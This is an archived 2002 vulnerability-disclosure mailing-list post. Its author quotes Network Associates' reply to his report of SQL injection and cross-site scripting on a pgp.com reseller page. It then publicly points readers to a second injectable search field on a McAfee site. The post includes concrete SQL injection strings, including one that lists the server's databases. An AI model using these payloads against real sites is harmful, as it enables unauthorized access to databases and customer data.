Vulnerability Development mailing list archives
Re: Pgp.com was exposing ... information.
From: c c <cesarc56 () yahoo com>
Date: Thu, 7 Feb 2002 08:25:50 -0800 (PST)
After the the post i received this e-mail: -------------------start------------------- Thank you for bringing this matter to our attention. The problem has been corrected. Web Support Network Associates websupport () nai com www.nai.com This e-mail and any files transmitted with it are the property of Network Associates and/or its affiliates, are confidential, and are intended solely for the use of the individual or entity to whom this e-mail is addressed. If you are not one of the named recipient (s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination forwarding, printing or copying of this e-mail is strictly prohibited. -----Original Message----- From: cesarc56 () yahoo com [mailto:cesarc56 () yahoo com] Sent: Thursday, January 24, 2002 10:49 AM To: websupport () nai com Subject: Error Messages Response Required? Yes Phone: 0054 0343 175838551 Problem Area: Error Messages Problem URL: http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.a sp?Country=Argentina')%20union%20select%20'a'-- Referring URL: http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.asp Problem Description: The script page refereced in the Problem url above, allow sql inyection and cross side scripting, this could reveal critical customer and database information. I Hope it's very Important to fix that quicly. Please contact me as soon as possible for details. Cesar Cerrudo. Parana, Entre Rios. Argentina. -------------------end------------------- A bit late no? NAI people don't forget to check this quickly : Goto : http://vil.mcafee.com/advsearch.asp and input in a search field this: asdf') union all select '1',name from master..sysdatabases-- and submit! You will Never learn. Sorry. Cesar Cerrudo. __________________________________________________ Do You Yahoo!? Send FREE Valentine eCards with Yahoo! Greetings! http://greetings.yahoo.com
Current thread:
- Pgp.com was exposing ... information. c c (Feb 06)
- <Possible follow-ups>
- Re: Pgp.com was exposing ... information. c c (Feb 07)